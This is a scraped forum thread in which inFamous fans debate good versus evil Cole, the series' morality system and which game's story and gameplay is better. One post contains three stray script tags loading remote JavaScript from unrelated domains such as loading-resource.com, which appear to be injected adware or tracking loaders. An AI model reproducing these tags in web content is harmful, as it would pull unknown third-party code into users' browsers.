Gaming Beast
2167 posts

Re: Good cole/ evil cole nerf

Jan 10, 2013
Who, big red beast, or big blue beast from Marvel?

In all seriousness though, the only issue I ever had with Infamous' storylines, either of them, was how you had to either be all good or all evil. There was no middle ground. For once I actually agree with Zero Punctuation instead of merely laughing at it, but it was like I either saved an orphanage full of children or tortured everyone they ever knew in front of them with no middle ground.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 31 of 40 (112 Views)
0 Likes
Wastelander
721 posts

Jan 10, 2013
I'm just sad I killed zeke.. ;_;
Message 32 of 40 (111 Views)
0 Likes
First Son
10 posts

Jan 10, 2013
@DrDude101 Yeah about that trash king Alden Tate, he was captured by Moya and cut open probably for experimentation. Its on the first inFamous comic
Message 33 of 40 (102 Views)
0 Likes
Hekseville Citizen
329 posts

Jan 10, 2013

Infamous 2, is my favorite game... ever. no joke, i actually consider that to be the best game i have played (in MY opinion).

the story was great, the gameplay was flawless, cole had a well made personality,  and the choices Actually had an impact on the end result. Both endings where EXTREEMLY well done. look at games like Mass Effect 3 and assassins creed 3, they cant even get one  ending right, and infamous 2 made two great endings....

the first infamous was great, but there is no comparison, infamous 2 was the obvious choice...

----------------------------------------------------------------------------------
Mario kills turtles..... kratos kills gods.

looking for some art to look at! look no further!
www.noahmorrow.deviantart.com/

Message 34 of 40 (99 Views)
0 Likes
First Son
3 posts

Jan 10, 2013

There was definnitly melee in the first Infamous. Cole didn't have the amp and used hand-to-hand combat. 

Message 35 of 40 (89 Views)
0 Likes
Wastelander
721 posts

Jan 10, 2013
~<(•_•(~< got it, I need to see the comic then. I'll say my opinion after.
Message 36 of 40 (88 Views)
0 Likes
Wastelander
853 posts

Feb 1, 2013
@DrDude101 (On first page):
The news caster? Do you mean Kessler? The guy who pretty much moved up the Ray Sphere creation date and forced it onto Cole? How would that help?
Alden? The GUY THAT DIED AT THE END? Wouldn't that make it harder to fit in? I liked him too, but jumping off a bridge after being defeated is kind of hard to survive.
Gameplay that would make him even more OP? Didn't you complain about that?

I loved inFAMOUS 2, but I just liked inFAMOUS 1. In the first one I felt like everyone hated me even when I saved them time and time again (And the gameplay wasn't my favorite), but in the second I felt like a true hero (And I loved the gameplay updates once I got used to them), and liked the story more (Mainly at the end though). Plus, everything didn't seem so boring in the background (Empire City seemed pretty drab all around (Excluding certain sections)). And, then there's the UGC. That pretty much sold the game for me (I love creating things). I'm pretty happy that they chose to have the Coles mainly from inFAMOUS 2, with the old outfits as costumes (Though I don't really like how they look so similar to a palette swap).
Message 37 of 40 (70 Views)
0 Likes
Hekseville Citizen
280 posts

Feb 1, 2013

Astroking112 wrote:
@DrDude101 (On first page):
The news caster? Do you mean Kessler? The guy who pretty much moved up the Ray Sphere creation date and forced it onto Cole? How would that help?
Alden? The GUY THAT DIED AT THE END? Wouldn't that make it harder to fit in? I liked him too, but jumping off a bridge after being defeated is kind of hard to survive.
Gameplay that would make him even more OP? Didn't you complain about that?

The thread got necroed. I don't recall who the news caster was refering to but the "black guy" makes more sense then anyone else in the game.

Message 38 of 40 (58 Views)
0 Likes
Wastelander
721 posts

Feb 1, 2013
Ah the guy I. The first game that tells everyone in the news that cole was the one who activated the ray sphere. I feel it'd make more done as in the first game when Kessler reveals why he did what he did to cole, he made it seem as if the best was hunting for cole specifically.
Message 39 of 40 (46 Views)
0 Likes
Uncharted Territory
1577 posts

Feb 1, 2013
You want the Infamous 1 Cole but you don't even know most of the character's name? Also Infamous 2 Cole anytime,he gets much more powers therefore making his gameplay more fun,and his Amp is practically his trademark,although I like to see his fist to fist action. The only complaint I have is their super,while G.Coles level 2 actually uses his new power,Evil Cole just uses Ionic Drain,I would've the Lightning Storm or the Hurricane.
Click click click click click click click click................... I need to get off the forums.
Image and video hosting by TinyPic
Signature created by GFXNinja/CyborgHippo
Message 40 of 40 (43 Views)
0 Likes